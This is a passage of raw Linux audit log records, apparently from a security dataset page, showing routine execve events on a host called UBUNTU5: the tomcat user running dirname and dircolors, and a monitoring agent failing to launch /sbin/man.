path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=2 cmdline=\"dirname /usr/bin/lesspipe\" redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=556f041a2aa8 a1=556f041a29e0 a2=556f041a2a18 a3=556f04197010 ppid=17802 pid=17803 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"dirname\" exe=\"/usr/bin/dirname\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/dirname\" inode=4158 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/dirname\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=2 cmdline=\"dirname /usr/bin/lesspipe\" redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:22.11Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:22Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292622.098:84154): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=556da3d96b50 a1=556da3d96f30 a2=556da3d96800 a3=556da3d7f010 ppid=17804 pid=17805 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"dircolors\" exe=\"/usr/bin/dircolors\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/dircolors\" inode=4157 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/dircolors\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=2 cmdline=\"dircolors -b\" redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=556da3d96b50 a1=556da3d96f30 a2=556da3d96800 a3=556da3d7f010 ppid=17804 pid=17805 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"dircolors\" exe=\"/usr/bin/dircolors\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/dircolors\" inode=4157 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/dircolors\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=2 cmdline=\"dircolors -b\" redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:22.143Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:22Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292622.126:84155): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=no exit=-2 a0=7fff7a940470 a1=1f34830 a2=7fff7a942a58 a3=7ff01b2bff90 ppid=2813 pid=17807 audit_user=unset auid=4294967295 user=nobody uid=65534 group=nogroup gid=65534 effective_user=nobody euid=65534 set_user=nobody suid=65534 filesystem_user=nobody fsuid=65534 effective_group=nogroup egid=65534 set_group=nogroup sgid=65534 filesystem_group=nogroup fsgid=65534 tty=(none) ses=\"-1\" comm=\"microsoft-depen\" exe=\"/opt/microsoft/dependency-agent/bin/microsoft-dependency-agent\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/sbin/man\" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/sbin/man\"] path_nametype=[\"UNKNOWN\"] path_mode=[\"\"] path_ouid=[\"\"] path_ogid=[\"\"] proctitle=/opt/microsoft/dependency-agent/bin/microsoft-dependency-agent redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=no exit=-2 a0=7fff7a940470 a1=1f34830 a2=7fff7a942a58 a3=7ff01b2bff90 ppid=2813 pid=17807 audit_user=unset auid=4294967295 user=nobody uid=65534 group=nogroup gid=65534 effective_user=nobody euid=65534 set_user=nobody suid=65534 filesystem_user=nobody fsuid=65534 effective_group=nogroup egid=65534 set_group=nogroup sgid=65534 filesystem_group=nogroup fsgid=65534 tty=(none) ses=\"-1\" comm=\"microsoft-depen\" exe=\"/opt/microsoft/dependency-agent/bin/microsoft-dependency-agent\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/sbin/man\" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/sbin/man\"] path_nametype=[\"UNKNOWN\"] path_mode=[\"\"] path_ouid=[\"\"] path_ogid=[\"\"] proctitle=/opt/microsoft/dependency-agent/bin/microsoft-dependency-agent redactors= containerid="}

Overview

Environment

Activity

Contained Data

Links

Data Examples